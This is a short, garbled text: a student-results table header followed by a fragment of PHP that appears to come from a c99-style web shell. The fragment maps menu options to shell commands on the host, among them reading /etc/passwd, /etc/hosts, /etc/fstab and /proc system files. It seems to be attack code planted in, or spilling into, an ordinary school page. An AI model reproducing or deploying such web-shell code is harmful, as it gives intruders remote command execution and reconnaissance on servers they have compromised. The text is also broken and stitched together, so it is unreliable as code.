Student Name Roll No. Reg. No Course Name Gread Point
}
processc99();
echo "

";
if (isset($systeminfo)) {
}
";
if (isset($winruncom)) {
if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";